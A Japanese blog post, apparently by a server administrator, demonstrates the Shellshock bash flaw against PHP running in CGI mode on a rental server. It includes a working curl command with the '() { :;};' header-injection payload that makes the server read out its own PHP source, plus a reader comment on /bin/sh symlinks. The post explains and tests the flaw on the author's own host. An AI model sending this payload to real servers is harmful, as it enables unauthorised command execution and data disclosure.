BASHの脆弱性でCGIモードで動いてるPHPにアレさせてみました

1件のフィードバック

タイトルはパクリ
元記事: BASHの脆弱性でCGIスクリプトにアレさせてみました – ブログ – ワルブリックス株式会社

sakura のレンタルサーバが cgi モードで php 動かしてるよなーと思ってテストしてみたらできました。
# テストスクリプトは削除済みです。

test.php



test.sh


#!/usr/local/bin/bash
echo "Content-type: text/plain"
echo
echo "Hi! I'm an ordinary CGI script which is executed by /usr/local/bin/bash"


結果 : Apache CGI版 PHP


$ curl -A '() { :;}; echo Content-type:text/plain;echo;/bin/cat test.php' http://wokamoto.sakura.ne.jp/test.php
Hey, I'm a PHP script so wouldn't be affected, right?
Content-type:text/plain

<?php
header( "Content-type: text/plain" );

echo "Hey, I'm a PHP script so wouldn't be affected, right?\n";

exec("/usr/local/bin/bash ".dirname(__FILE__)."/test.sh", $outputs);
//exec('df -h', $outputs);
foreach ($outputs as $output) {
  echo $output."\n";
}&#91;/text&#93;

影響を受けるのは exec() で bash を呼び出してる時だけで <code>exec('df -h', $outputs);</code> の時は問題無いです。

fastcgi で動いてる網元AMIでは、同じコードでも影響受けなかった。
<strong>結果 : fastcgi (網元AMI)</strong>
[text]$ curl -A "() { :;}; echo Content-type:text/plain;echo;/bin/cat test.php" test.dogmap.jp/test.php
Hey, I'm a PHP script so wouldn't be affected, right?
Content-type: text/plain

Hi! I'm an ordinary CGI script which is executed by /bin/bash



					

		
		
	


				

				



	
			
BASHの脆弱性でCGIモードで動いてるPHPにアレさせてみました」への1件のフィードバック		


		
    
					
  1. 
		
    
			
    
				kakiko 				
    

				
				
				
    
				
    /bin/shがbashへのシンボリックリンクになっている環境では、
    

     exec(‘df -h’, $outputs)

    

    でも影響をうける気がします。(検証はしていません)
    

    RedHat系のディストリは、デフォルトでbashへのシンボリックリンクになってます。
    
debian系やFreeBSDなどは違うようです。(全て確認したわけではありません)
    
								
    

				
    
				返信 				
    
			
    
				
    2. 
		


		
		
	
		

		
コメントを残す 
メールアドレスが公開されることはありません。  が付いている欄は必須項目です
 
 



 


 


	

	
このサイトはスパムを低減するために Akismet を使っています。コメントデータの処理方法の詳細はこちらをご覧ください